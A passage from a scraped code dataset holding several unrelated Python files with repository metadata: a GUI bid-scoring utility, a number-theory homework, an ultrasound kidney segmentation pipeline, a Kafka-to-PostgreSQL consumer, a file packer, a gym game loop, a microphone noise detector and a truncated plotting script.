"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
5393022370 | import PySimpleGUI as sg
from Utility import PathDefs
NAME_SIZE = 20  # fixed label width (in characters) for parameter names
def name(name):
    """Build a right-justified label padded with bullet dots to the fixed
    NAME_SIZE width, as a PySimpleGUI Text element."""
    filler = '•' * (NAME_SIZE - len(name) - 2)
    label = name + ' ' + filler
    return sg.Text(label, size=(NAME_SIZE, 1), justification='r', pad=(0, 0), font='Courier 10')
def create_rows(max_cost, max_mass, max_disp, max_time, cost_coef, mass_coef, disp_coef, time_coef, response, dataMaxes):
    """Build the GUI row for each bid that passes the hard limits.

    Bids exceeding any max_* limit are dropped.  Each surviving bid gets
    a weighted score, progress bars colored by the coefficients, action
    buttons, and a score-colored pane; the bid dict is augmented with
    'score', 'content' (the layout), 'color' and 'pic'.
    """
    final_bids = []
    for bid in response:
        # Hard filter: skip any bid violating a user-set limit.
        if (bid["cost"] > max_cost) or (bid["time"] > max_time) or (bid["mass"] > max_mass) or bid["disp"] > max_disp:
            continue
        score = generate_score(cost_coef, mass_coef, disp_coef, time_coef, bid["cost"],
                               bid["time"], bid["mass"], bid["disp"], dataMaxes)
        # One progress bar per metric; bar color darkens with coefficient weight.
        layout_bars = [[name('Cost'), sg.ProgressBar(dataMaxes["cost"], orientation='h', s=(10, 20),
                                                     k=('-CBAR-'+bid["link"]),
                                                     bar_color=(getParamBarColor(cost_coef), "grey"))],
                       [name('Lead Time'), sg.ProgressBar(dataMaxes["time"], orientation='h', s=(10, 20),
                                                          k=('-TBAR-'+bid["link"]),
                                                          bar_color=(getParamBarColor(time_coef), "grey"))],
                       [name('Mass'), sg.ProgressBar(dataMaxes["mass"], orientation='h', s=(10, 20),
                                                     k=('-MBAR-'+bid["link"]),
                                                     bar_color=(getParamBarColor(mass_coef), "grey"))],
                       [name('Max Displacement'), sg.ProgressBar(dataMaxes["disp"], orientation='h', s=(10, 20),
                                                                 k=('-DBAR-'+bid["link"]),
                                                                 bar_color=(getParamBarColor(disp_coef), "grey"))]]
        # Button keys embed the bid link so event handlers can find the bid.
        layout_buttons = [
            [sg.Col([[sg.Button('Design File', key=("designf"+bid["link"]), enable_events=True),
                      sg.Button('Supplier Info', key=("supplier"+bid["link"]), enable_events=True)]])],
            [sg.Col([[sg.Button('Process Plan', key=("pplan"+bid["link"]), enable_events=True),
                      sg.Button('Initiate Contract', button_color='green')]])]
        ]
        score_color, hex = getScoreColor(float(score))
        layout_c = [sg.Image(getImagePath(bid["link"], False)),
                    sg.Pane([sg.Col([[sg.T('Score' + '\n' + str(round(score, 2)), justification='c',
                                           background_color=score_color)]], background_color=score_color)],
                            background_color=score_color),
                    sg.Col(layout_bars), sg.Col(layout_buttons)]
        content = [sg.Frame(bid["link"], [[sg.Col([layout_c], p=20, vertical_alignment='t')]], border_width=3)]
        # Augment the bid dict in place for the caller.
        bid["score"] = score
        bid["content"] = content
        bid["color"] = hex
        bid["pic"] = getImagePath(bid["link"], True)
        final_bids.append(bid)
    return final_bids
def generate_score(cost_coef, mass_coef, disp_coef,
                   time_coef, cost, time, mass, displacement, dataMaxes):
    """Weighted 0-100 score: each metric contributes its coefficient times
    the normalized headroom (max - value) / max."""
    cost_term = cost_coef * (dataMaxes["cost"] - cost) / dataMaxes["cost"]
    mass_term = mass_coef * (dataMaxes["mass"] - mass) / dataMaxes["mass"]
    time_term = time_coef * (dataMaxes["time"] - time) / dataMaxes["time"]
    disp_term = disp_coef * (dataMaxes["disp"] - displacement) / dataMaxes["disp"]
    return 100 * (cost_term + mass_term + time_term + disp_term)
def sortRows(final_bids, value):
    """Sort bids by the given key ('score' sorts descending, any other key
    ascending) and return their 'content' layouts in that order."""
    descending = (value == "score")
    ordered = sorted(final_bids, key=lambda bid: bid[value], reverse=descending)
    return [bid["content"] for bid in ordered]
def getScoreColor(score):
    """Map a 0-100 score to a (Tk color name, hex code) pair; higher
    scores map to greener colors, lower to redder."""
    bands = (
        (90, "dark green", '#006400'),
        (80, "lime green", '#32CD32'),
        (70, "OliveDrab1", '#C0FF3E'),
        (60, "yellow", '#FFFF00'),
        (50, "tan1", '#FFA54F'),
        (40, "orange", '#FFA500'),
        (30, "orange red", '#FF4500'),
        (20, "red", '#FF0000'),
        (10, "red4", '#8B0000'),
    )
    for floor, color_name, hex_code in bands:
        if score >= floor:
            return color_name, hex_code
    return "maroon", '#B03060'
def getParamBarColor(coef):
    """Map a 0-1 importance coefficient to a blue shade; darker blues mean
    a more heavily weighted parameter."""
    shades = (
        (0.9, 'midnight blue'),
        (0.8, 'navy'),
        (0.7, 'medium blue'),
        (0.6, 'blue2'),
        (0.5, 'blue'),
        (0.4, 'dodger blue'),
        (0.3, 'DeepSkyBlue3'),
        (0.2, 'deep sky blue'),
        (0.1, 'SkyBlue1'),
    )
    for floor, shade in shades:
        if coef >= floor:
            return shade
    return 'LightSkyBlue1'
def getImagePath(link, isGraphImage):
    """Return the path to a design's preview image as a string.

    link: design identifier (subdirectory under the design data root).
    isGraphImage: True selects the small 75x75 image, False the 110x110.
    """
    # path = "C:\\Users\\akimmel\\PycharmProjects\\LMCOgui\\Utility\\Data\\executable-win\\executable-win\\data\\burak-initial-dataset-v4-zbr\\Generative_Design_Data\\"
    suffix = "part75x75.png" if isGraphImage else "part110x110.png"
    return str(PathDefs.design_path / str(link) / suffix)
| anikimmel/LMCOgui | Utility/row_utilities.py | row_utilities.py | py | 5,099 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PySimpleGUI.Text",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.ProgressBar",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.ProgressBar",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "PySim... |
39117095073 | """
CS235 Homework 3
Aleksander Skjoelsvik
"""
from math import floor
from fractions import gcd
#Task 1:
"""
a:
4x = 2 (mod 11)
4x = 24 (mod 11)
x = 6 + 11Z
b:
x = 3 (mod 7)
x = 1 (mod 5)
x = 31 + 35Z
c:
x = 2 (mod p)
x = 4 (mod q)
x = 2(q * q^(-1)) + 4(p * p^(-1)) (mod (p*q))
= 2 * q * 3 + 4 * p * 5
= 6q + 20p (mod pq)
d:
x = 4 (mod 5)
x = 3 (mod 14)
x = 59 + 70Z
(range x E Z/70Z)
"""
#Task 2:
def invPrime(a, p):
    """Modular inverse of a mod prime p via Fermat's little theorem
    (a**(p-2) mod p); returns None for a == 0, which has no inverse."""
    return None if a == 0 else pow(a, p - 2, p)
def egcd(a, b):
    """Extended Euclidean algorithm: return Bezout coefficients (s, t)
    satisfying s*a + t*b == gcd(a, b) for the original inputs."""
    s_prev, s_cur = 1, 0
    t_prev, t_cur = 0, 1
    while b != 0:
        q, r = divmod(a, b)
        a, b = b, r
        s_prev, s_cur = s_cur, s_prev - q * s_cur
        t_prev, t_cur = t_cur, t_prev - q * t_cur
    return (s_prev, t_prev)
def inv(a, m):
    """Modular inverse of a mod m, or None when gcd(a, m) != 1.

    Rewritten with the three-argument pow and exponent -1 (Python 3.8+):
    the original depended on fractions.gcd, which was removed in 3.9.
    The result is the canonical representative in [0, m), exactly as the
    old ``egcd(...)[0] % m`` produced.
    """
    try:
        return pow(a, -1, m)
    except ValueError:
        # pow raises ValueError precisely when a is not invertible mod m.
        return None
#Task 3:
def solveOne(c, a, m):
    """Solve c*x = a (mod m); return the canonical x in [0, m), or None
    when c is not invertible mod m.

    Uses pow(c, -1, m) (Python 3.8+) instead of the removed fractions.gcd,
    so the block no longer depends on a deprecated import.
    """
    try:
        return a * pow(c, -1, m) % m
    except ValueError:
        # c has no inverse mod m (gcd(c, m) != 1).
        return None
def solveTwo(e1, e2):
    """Solve the simultaneous congruences c*x = a (mod m) and d*x = b
    (mod n) by the Chinese Remainder Theorem; m and n must be coprime.

    Returns x in [0, m*n), or None when either single congruence is
    unsolvable or the moduli share a common factor.

    Bug fixes versus the original:
    * the None-check tested x1 twice and never x2;
    * part1/part2 were computed before that check, so an unsolvable second
      congruence raised TypeError instead of returning None;
    * fractions.gcd (removed in Python 3.9) is no longer needed —
      pow(..., -1, mod) raises ValueError for every non-invertible case.
    """
    (c, a, m) = e1
    (d, b, n) = e2
    try:
        # Solve each congruence on its own modulus.
        x1 = a * pow(c, -1, m) % m
        x2 = b * pow(d, -1, n) % n
        # CRT combination: m*inv(m, n) is 1 mod n and 0 mod m (and vice
        # versa), so each term carries exactly one residue.
        part1 = m * pow(m, -1, n) * x2
        part2 = n * pow(n, -1, m) * x1
    except ValueError:
        # Raised when c or d is not invertible, or gcd(m, n) != 1.
        return None
    return (part1 + part2) % (m * n)
def solveAll(es):
    """Reduce a list of congruences (c, a, m) to a single solution by
    repeatedly merging the last two entries with solveTwo.

    Mutates *es* (pops everything) and returns the final residue.
    """
    while len(es) > 1:
        first = es.pop()
        second = es.pop()
        merged = solveTwo(first, second)
        combined_modulus = first[2] * second[2]
        es.append((1, merged, combined_modulus))
    _, residue, _ = es.pop()
    return residue
#Task 4:
""" A:
def sumOfPowers(nes, ps):
answers = []
for p in ps:
answers += [(1, sum([pow(n, e, p) for (n, e) in nes]), p)]
return solveAll(answers)
B: """
def sumOfPowers(nes, ps):
    """Compute sum(n**e for (n, e) in nes) modulo the product of the
    primes in ps, via per-prime residues combined with solveAll.

    Exponents are reduced mod p-1 (Fermat's little theorem) before the
    modular power.  NOTE(review): that reduction assumes p does not
    divide any base — confirm for the intended inputs.
    """
    congruences = [
        (1, sum(pow(base, exp % (p - 1), p) for (base, exp) in nes), p)
        for p in ps
    ]
    return solveAll(congruences)
| alekplay/schoolwork | CS235/hw3.py | hw3.py | py | 1,964 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "fractions.gcd",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 76,
"usage_type": "call"
}
] |
74069745633 | ### FUNCTIONS
import skimage
import numpy as np
from math import sqrt
from skimage.feature import blob_dog, blob_log
from PIL import Image
import torch
from torchvision import transforms
import matplotlib.pyplot as plt
import matplotlib
import cv2
import os
### 1 GET DISTANCE
def crop_x(image, x1=100, x2=250, y1=38, y2=48):
    """Crop a 3-channel image to rows [y1, y2) and columns [x1, x2),
    keeping all channels."""
    rows = slice(y1, y2)
    cols = slice(x1, x2)
    return image[rows, cols, :]
def crop_x2D(image, x1=100, x2=250, y1=38, y2=48):
    """Crop a single-channel (2-D) image to rows [y1, y2) and columns
    [x1, x2)."""
    rows = slice(y1, y2)
    cols = slice(x1, x2)
    return image[rows, cols]
def find_points(image, laplacian=True):
    """Detect blobs and return them as an (N, 3) array of (row, col, radius).

    laplacian=True uses Laplacian-of-Gaussian detection; False uses the
    faster Difference-of-Gaussian.  The third column is the detector's
    sigma scaled by sqrt(2) to approximate the blob radius.
    """
    image_gray = skimage.color.rgb2gray(image)
    if laplacian == True:
        blobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1)
        # Convert sigma to an approximate blob radius.
        blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)
        return blobs_log
    else:
        blobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1)
        blobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)
        return blobs_dog
def crop_image(img):
    """Crop *img* to a thin 140x4 strip anchored at the first small blob
    (radius < 1.5) found by Difference-of-Gaussian detection.

    Control flow note: when no small blob exists, x and y stay unbound;
    the bare ``except`` around ``if y < 3`` catches the resulting
    NameError and falls back to second_crop (the LoG-based variant).
    """
    if len(np.shape(img)) == 3:
        img1 = crop_x(img,100,300,0,60)
    else:
        img1 = crop_x2D(img,100,300,0,60)
    points = find_points(img1,laplacian=False)
    for p in points:
        if p[2] <1.5:
            x = int(p[1])
            y = int(p[0])
            break
    try:
        # Clamp y away from the top edge so the y-2 crop stays valid.
        if y <3:
            y=3
    except:
        # No small blob found (y unbound): retry with the LoG detector.
        img = second_crop(img)
        return img
    # Clamp x so the x-10 crop stays inside the image.
    if x<49:
        x=50
    img = crop_x(img, x1=(x-10),x2=(x+130),y1=(y-2),y2=(y+2))
    return img
def second_crop(img):
    """Fallback crop using Laplacian-of-Gaussian blob detection.

    Same strip-cropping logic as crop_image; when even LoG finds no small
    blob (y unbound, raising UnboundLocalError), falls back to a fixed
    default crop via crop_x(img, y1=0).
    """
    if len(np.shape(img)) == 3:
        img1 = crop_x(img,100,300,0,60)
    else:
        img1 = crop_x2D(img,100,300,0,60)
    points = find_points(img1,laplacian=True)
    for p in points:
        if p[2] <1.5:
            x = int(p[1])
            y = int(p[0])
            break
    try:
        # Clamp y away from the top edge so the y-2 crop stays valid.
        if y <3:
            y=3
    except UnboundLocalError:
        # No small blob at all: use the fixed default crop region.
        img = crop_x(img,y1=0)
        return img
    # Clamp x so the x-10 crop stays inside the image.
    if x<49:
        x=50
    img = crop_x(img, x1=(x-10),x2=(x+130),y1=(y-2),y2=(y+2))
    return img
def get_distance_x(points):
    """Mean horizontal gap between small blobs (radius < 1.5).

    points: iterable of (row, col, radius) triples as produced by the
    blob detectors.  Returns the average distance between consecutive
    sorted x coordinates.
    """
    xs = [p[1] for p in points if p[2] < 1.5]  # renamed: original shadowed builtin all()
    xs = np.sort(xs)
    gaps = [abs(right - left) for left, right in zip(xs, xs[1:])]
    return np.mean(gaps)
### 2 PREPROCESSING
def preprocess_img(file):
    """Open the image at *file* and crop it to 375x375 pixels.

    The crop is position-based only (it does not locate the kidney):
    horizontally centered, vertically offset by a quarter of the excess
    height.  Returns the cropped PIL image.
    """
    im = Image.open(file) #IMAGE
    im_dim= np.shape(im)[:2] #we get the dimension of the image (and the masks)
    min_s = 375
    #getting the number of pixels we need to remove
    h = im_dim[0] - min_s
    w = im_dim[1] - min_s
    left = int(w/2); right = min_s+int(w/2)
    top = int(h/4); bottom = min_s+int(h/4)
    ######################################## CROP AND RETURN ####################################################
    #IMAGE
    im2 = im.crop((left, top, right, bottom))
    return im2
### 3 CLASIFICATION
def probs_to_prediction(probs, threshold):
    """Threshold class-1 probabilities into hard labels.

    probs: (N, 2) array/tensor of per-class probabilities.
    Returns a list with 1 (pathological) where P(class 1) > threshold,
    else 0 (healthy).
    """
    class1_probs = probs[:, 1]
    return [1 if p > threshold else 0 for p in class1_probs]
def predictionRESNET(model, image_test, threshold = 0.5):
    """Classify one image with the given ResNet-style model.

    model: classification network producing 2 logits.
    image_test: input image; preprocessed and reshaped to (1, 3, 375, 375).
    threshold: probability cutoff for the pathological class.
    Returns 0 (healthy) or 1 (pathological).
    """
    image_test = preprocess_for_model(image_test)
    with torch.no_grad():
        model.eval()
        image_test = image_test.reshape((1,3,375,375))
        outputs_t = model(image_test)
        ## PREDICTIONS
        # Softmax over the two logits, then threshold class 1.
        prob_t = torch.nn.functional.softmax(outputs_t, dim=1)
        pred_t = probs_to_prediction(prob_t, threshold)
    return pred_t[0]
def preprocess_for_model(img, type_model = 1):
    """Convert an image to a tensor for a model.

    type_model = 1 (classification): plain float tensor from the raw array.
    type_model = 2 (segmentation): torchvision ToTensor (scales to [0, 1]
    and moves channels first).
    """
    data_transforms = transforms.Compose([transforms.ToTensor()])
    if type_model == 2:
        # new_img = np.moveaxis(new_img, 2,0)
        # return DataLoader(torch.tensor(new_img)).dataset[0]
        return data_transforms(img)
    else:
        new_img = np.array(img)
        return torch.tensor(new_img, dtype=torch.float)
### 4 SEGMENTATION
def predictionDEEPLABV(model, image_test, threshold = 0.6, save=False):
    """Segment one image with a DeepLabV3-style model.

    model: segmentation network returning a dict with key 'out'.
    threshold: mask values >= threshold become 1, the rest 0.
    save: when True, also writes the binary mask to 'test.jpg'.
    Returns the binarized mask as a numpy int array.
    """
    image_test = preprocess_for_model(image_test, 2)
    with torch.no_grad():
        model.eval()
        mask = model(image_test.unsqueeze_(0))['out']
        mask = mask.detach().numpy()
    # Binarize: boolean comparison * 1 yields an int mask.
    new_mask = (mask>= threshold) *1
    if save:
        plt.imshow(new_mask.reshape((375, 375,1)))
        plt.savefig('test.jpg')
    return new_mask
### 5 AREA AND THICKNESS
def getArea_Thickness_Parenchyma(mask: np.array, px_cm:float):
    """Estimate parenchyma area and thickness from a 375x375 binary mask.

    The mask is round-tripped through a temporary PNG so OpenCV can find
    the largest contour and fit an ellipse; the ellipse's major axis is
    used to cut away the lower half, the minor axis to sample thickness.
    px_cm: pixels-per-centimeter scale.  Returns [area*2, thickness].
    """
    file = 'test.png'
    mask = mask.reshape((375,375))
    matplotlib.image.imsave(file , mask) #better not in black and white so we can check better the ellipse when plotting
    image = cv2.imread(file, 0)
    os.remove(file)
    ret,thresh = cv2.threshold(image,150,255,0)
    contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    # Keep the contour with the most points (assumed to be the organ).
    c_max = 0
    for c in range(len(contours)):
        if len(contours[c]) > c_max:
            c_max = len(contours[c])
            cnt = contours[c]
    ellipse_old = cv2.fitEllipse(cnt)
    ### AREA ________________________________________________________
    #change values of axis lengh
    ellipse = list(ellipse_old)
    ellipse[1] = [0, 500] #makes the mayor axis bigger
    # NOTE(review): cv2.ellipse normally expects a tuple RotatedRect —
    # confirm the list form is accepted by the installed OpenCV.
    ellipse_img = cv2.ellipse(image,ellipse, (0,0,255), 1)
    for j in range(ellipse_img.shape[1]):
        idx_min = np.argmin(ellipse_img[:, j])
        #once we have the idx, we can transform all into zeros (below)
        mask[idx_min:, j] = 0
    pixels_paren = np.sum(mask==1)
    area = round(pixels_paren/px_cm, 2)
    ### THICKNESS_____________________________________________________
    ellipse = list(ellipse_old)
    ellipse[1] = [500, 0] #makes the minor axis bigger
    black_img = np.zeros((375, 375), dtype = np.uint8)
    ellipse_img = cv2.ellipse(black_img,ellipse, (255,255,255), 1) #to draw only the ellipse
    # Count mask pixels lying exactly on the drawn ellipse outline.
    ones_img = mask*ellipse_img
    pixels_paren = np.sum(ones_img==255)
    thick = round(pixels_paren/px_cm, 2)
    return [area*2, thick]
### 6 AREA AND THICKNESS KIDNEY
def getArea_Thickness_Kidney(mask: np.array, px_cm:float):
    """Estimate kidney area and ellipse axis lengths from a 375x375 mask.

    Fits an ellipse to the largest contour (by cv2.contourArea) of the
    binarized mask.  px_cm: pixels-per-centimeter scale.
    Returns [area, major_axis, minor_axis] in scaled units.
    """
    file = 'test.png'
    mask = mask.reshape((375,375))
    matplotlib.image.imsave(file , mask) #better not in black and white so we can check better the ellipse when plotting
    img = cv2.imread(file, 0)
    os.remove(file)
    ret, thresh = cv2.threshold(img, 150, 255, 0)
    contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    ellipse_contour = max(contours, key=cv2.contourArea)
    ellipse = cv2.fitEllipse(ellipse_contour)
    (x, y), (minor_axis, major_axis), angle = ellipse
    ## AREA
    area = round(np.sum(mask==1)/px_cm, 2)
    ## AXIS LENGTH
    mayor = round(major_axis/px_cm, 2)
    minor = round(minor_axis/px_cm, 2)
    return [area, mayor, minor]
| AlmudenaBravoC/CAD-ultrasound-renal-diagnosis | TestImage/allProcess.py | allProcess.py | py | 6,977 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "skimage.color.rgb2gray",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "skimage.color",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "skimage.feature.blob_log",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "ma... |
30558238775 | import psycopg2
import json
from kafka import KafkaConsumer
class Consumer:
    """Kafka consumer that persists website-availability messages into a
    PostgreSQL table.

    Construction loads config.json, connects to Kafka (over SSL) and to
    Postgres, then blocks forever polling the topic and saving each
    message into ``website_availability``.
    """
    kafka_server = None
    consumer = None
    kafka_topic = None
    db_config = None
    db_conn = None

    def __init__(self):
        config = self.load_config()
        self.kafka_server = config['credentials']['kafka']['uri']
        self.kafka_topic = config['credentials']['kafka']['topic']
        self.db_config = config['credentials']['db']
        self.init_consumer()
        self.db_connect()
        # Blocks forever: consume and persist messages.
        self.poll_from_topic()

    def load_config(self):
        """Load and return the JSON configuration from config.json."""
        with open('config.json') as json_file:
            config = json.load(json_file)
        return config

    def init_consumer(self):
        """Initialize the consumer and connect to the Kafka server (SSL,
        JSON-deserialized values)."""
        try:
            consumer = KafkaConsumer (
                self.kafka_topic,
                bootstrap_servers=self.kafka_server,
                security_protocol="SSL",
                ssl_cafile="keys/ca.pem",
                ssl_certfile="keys/service.cert",
                ssl_keyfile="keys/service.key",
                value_deserializer=lambda x: json.loads(x.decode('utf-8'))
            )
        except Exception as ex:
            # Chain the original failure so the root cause is debuggable.
            raise Exception("Unable to connect to Kafka from consumer") from ex
        self.consumer = consumer

    def db_connect(self):
        """Connect to PostgreSQL using the configured credentials."""
        # db connect
        # https://www.postgresqltutorial.com/postgresql-python/connect/
        try:
            conn = psycopg2.connect(
                host=self.db_config['host'],
                database=self.db_config['db_name'],
                port=self.db_config['port'],
                user=self.db_config['user'],
                password=self.db_config['password']
            )
            conn.autocommit = True
            self.db_conn = conn
            print("Connected to the Database")
        except Exception as ex:
            raise Exception("Unable to connect to database") from ex

    def save_message(self, msg):
        """Insert one polled Kafka message into website_availability.

        Errors are printed but swallowed so the poll loop keeps running.
        """
        try:
            cur = self.db_conn.cursor()
            # Parameterized insert: the original str.format interpolation
            # was an SQL-injection vector for attacker-controlled payloads.
            cur.execute(
                "insert into website_availability(website, status_code, response_time, regex_found) "
                "values(%s, %s, %s, %s)",
                (
                    msg.value["target"],
                    msg.value["status_code"],
                    msg.value["response_time"],
                    msg.value["regex"],
                ),
            )
        except Exception as ex:
            print(ex)

    def poll_from_topic(self):
        """Consume messages forever, saving and echoing each one."""
        for msg in self.consumer:
            self.save_message(msg)
            print("Topic Name=%s,Message=%s"%(msg.topic,msg.value))
if __name__ == "__main__":
    # Constructing the consumer connects and starts the blocking poll loop.
    c = Consumer()
{
"api_name": "json.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "kafka.KafkaConsumer",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "psycopg2.connect",
"line... |
42448765073 | import argparse
import glob
import json
import os
import sys
# Pack many small annotation .txt files into larger chunks of at least
# min_tokens lines each, recording which input files went into each
# output chunk in a .metadata JSON file.
MIN_PYTHON = (3, 0)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python {}.{} or later is required.\n".format(*MIN_PYTHON))
parser = argparse.ArgumentParser()
parser.add_argument("input", help="input directory with files to annotate")
parser.add_argument("output", help="output directory to put packed files")
parser.add_argument("min_tokens", help="minimum number of tokens per file", type=int)
args = parser.parse_args()
if not os.path.isdir(args.input):
    sys.exit("Error: {} does not exist".format(args.input))
if not os.path.exists(args.output):
    os.makedirs(args.output)
basename = None       # 6-character prefix shared by the output chunk names
lines = []            # accumulated lines for the chunk being built
files = []            # per-input-file bookkeeping for the current chunk
count = 1             # 1-based chunk counter used in output filenames
metadata = {}         # output filename -> list of contributing input files
for filename in sorted(glob.glob(os.path.join(args.input, "*.txt"))):
    # grab first 6 characters: IL6_NW
    if basename is None:
        basename = os.path.basename(filename)[0:6]
    with open(filename, 'r') as ifp:
        new_lines = [x for x in ifp]
    # must have an empty line at end of file
    if len(new_lines[-1].split('\t')) > 2:
        new_lines.append('\n')
    # remove tsv header after first file
    if len(lines) > 0 and new_lines[0][0:5] == 'TOKEN':
        del new_lines[0]
    num_lines = len(new_lines)
    # we don't write out header to annotation file
    if len(lines) == 0:
        num_lines -= 1
    files.append({'filename': os.path.basename(filename), 'num_lines': num_lines})
    lines.extend(new_lines)
    if len(lines) > args.min_tokens:
        out_filename = os.path.join(args.output, "{}_{:03d}.txt".format(basename, count))
        with open(out_filename, 'w') as ofp:
            ofp.writelines(lines)
        metadata[os.path.basename(out_filename)] = files
        lines = []
        files = []
        count += 1
# NOTE(review): any remainder smaller than min_tokens left in `lines`
# after the loop is never written out — confirm this is intentional.
with open(os.path.join(args.output, '.metadata'), 'w') as mfp:
    json.dump(metadata, mfp)
| iscoe/dragonfly | scripts/pack.py | pack.py | py | 1,916 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "sys.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
... |
9249662097 | import gym
# Set learning parameters
LEARNING_RATE = .8     # NOTE(review): defined but not used in this script
DISCOUNT_FACTOR = .95  # NOTE(review): defined but not used in this script
NUM_EPISODES = 2000
def state_to_scalar(state):
    """Flatten an (H, W, C) observation into a column vector of shape
    (H*W*C, 1)."""
    flat_len = state.shape[0] * state.shape[1] * state.shape[2]
    return state.reshape(flat_len, 1)
# Epsilon-greedy-style tabular Q exploration loop over the gym env.
# NOTE(review): `np` is used below but numpy is never imported in this
# file; also SpaceInvaders observations are images (a Box space), so
# `env.observation_space.n` and indexing Q by an array `state` look
# broken — confirm intent before running.
env = gym.make('SpaceInvaders-v0')
env.reset()
print('env.observation_space.n', env.observation_space.n)
Q = np.zeros([env.observation_space.n,env.action_space.n])
for i_episode in range(NUM_EPISODES):
    state = observation = env.reset()
    state = state_to_scalar(state)
    for t in range(1000):
        print('state', state.shape)
        env.render()
        #print('env.action_space', env.action_space)
        #action = env.action_space.sample()
        # Greedy action plus decaying random noise for exploration.
        action= np.argmax(Q[state,:] + np.random.randn(1,env.action_space.n)*(1./(i_episode+1)))
        state_updated, reward, done, info = env.step(action)
        state_updated = state_to_scalar(state_updated)
        print('reward', reward)
        state = state_updated
        if done:
            print("Episode finished after {} timesteps".format(t+1))
            break
| raphaelgodro/open-ai-trains | space_invaders.py | space_invaders.py | py | 1,080 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gym.make",
"line_number": 16,
"usage_type": "call"
}
] |
23163444909 | import pyaudio
import math
import struct
# Audio capture configuration.
Threshold = 10           # RMS level (scaled by 1000) above which we react
SHORT_NORMALIZE = (1.0/32768.0)  # maps signed 16-bit samples to [-1.0, 1.0]
swidth = 2               # bytes per sample (16-bit PCM)
chunk = 1024             # frames read per stream.read() call
FORMAT = pyaudio.paInt16
CHANNELS = 1             # mono
RATE = 16000             # sample rate in Hz
# NOTE(review): unused in the visible code -- presumably a recording target
# directory for a later feature; verify before removing.
f_name_directory = r'audiofiles'
class Listener:
    """Opens a PyAudio input stream and reports every audio chunk whose RMS
    level exceeds the module-level ``Threshold``."""

    @staticmethod
    def rms(frame):
        """Return the root-mean-square level of raw 16-bit PCM bytes, x1000.

        Args:
            frame: bytes containing native-endian signed 16-bit samples.
        """
        # Bug fix: use integer division -- len(frame) is a multiple of the
        # 2-byte sample width and struct needs an int count anyway (the
        # original float only worked via '%d' truncation).
        count = len(frame) // swidth
        fmt = "%dh" % count  # 'fmt' avoids shadowing the builtin format()
        samples = struct.unpack(fmt, frame)
        sum_squares = 0.0
        for sample in samples:
            normalized = sample * SHORT_NORMALIZE  # scale to [-1.0, 1.0]
            sum_squares += normalized * normalized
        # math.sqrt is equivalent to the original math.pow(x, 0.5)
        return math.sqrt(sum_squares / count) * 1000

    def __init__(self):
        """Open a duplex 16 kHz mono stream using module-level settings."""
        self.p = pyaudio.PyAudio()
        self.stream = self.p.open(format=FORMAT,
                                  channels=CHANNELS,
                                  rate=RATE,
                                  input=True,
                                  output=True,
                                  frames_per_buffer=chunk)
        self.sound_count = 0

    def react(self):
        """Record one detection and announce we are listening again."""
        self.sound_count += 1
        print(f'Noise detected. Count: {self.sound_count}')
        print("Listening for sound")

    def listen(self):
        """Block forever, reading chunks and reacting to loud ones."""
        print('Listening beginning')
        while True:
            data = self.stream.read(chunk)  # 'data' avoids shadowing input()
            rms_val = self.rms(data)
            if rms_val > Threshold:
                self.react()
# Module entry point: runs on import. NOTE(review): consider guarding with
# `if __name__ == '__main__':` so the class is importable without side effects.
a = Listener()
a.listen() | astuvan/av_generator | sound/react_to_sound/react_threshold.py | react_threshold.py | py | 1,392 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pyaudio.paInt16",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "struct.unpack",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "math.pow",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "pyaudio.PyAudio",
"li... |
35947581054 | # -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
"""
This script is for plotting G1/G2/G4 data of calculated Symm-Func for
train and predict of Lammps-MD 1000K LC7
"""
def plotG(symdt, plttitle, plotfile, xlb, clr):
# Scatter-plot every G-value vector in `symdt` against the categorical
# x labels `xlb` (one color per symmetry-function family) and save to
# `plotfile`.  Original indentation was lost in extraction; the exact
# nesting level of `num=num+1` (per sample vs per G vector) is presumed
# per-sample -- TODO confirm against the repository.
fig = plt.figure()
ax = fig.add_subplot(111)
plt.title(plttitle)
ax.set_ylabel("Value of G")
ax.grid(True)
num=0
for symdata in symdt:
for eachsample in symdata:
print(f'{num}: {plttitle}')
for gdata in eachsample:
ax.scatter(xlb, gdata, c=clr, marker='.')
num=num+1
# rotate the categorical x labels so all 41 fit
labels = ax.get_xticklabels()
plt.setp(labels, rotation=90, fontsize=8);
plt.savefig(plotfile)
plt.close()
def gatherG(root, outfolder, grps, md):
# For each lattice-constant group, load train and predict symmetry-function
# arrays from .npz files under `root` and plot them with plotG.
# x labels: 1x G1, 24x G2, 16x G4; colors b/g/c per family.
# NOTE: indentation was lost in extraction; nesting below is presumed.
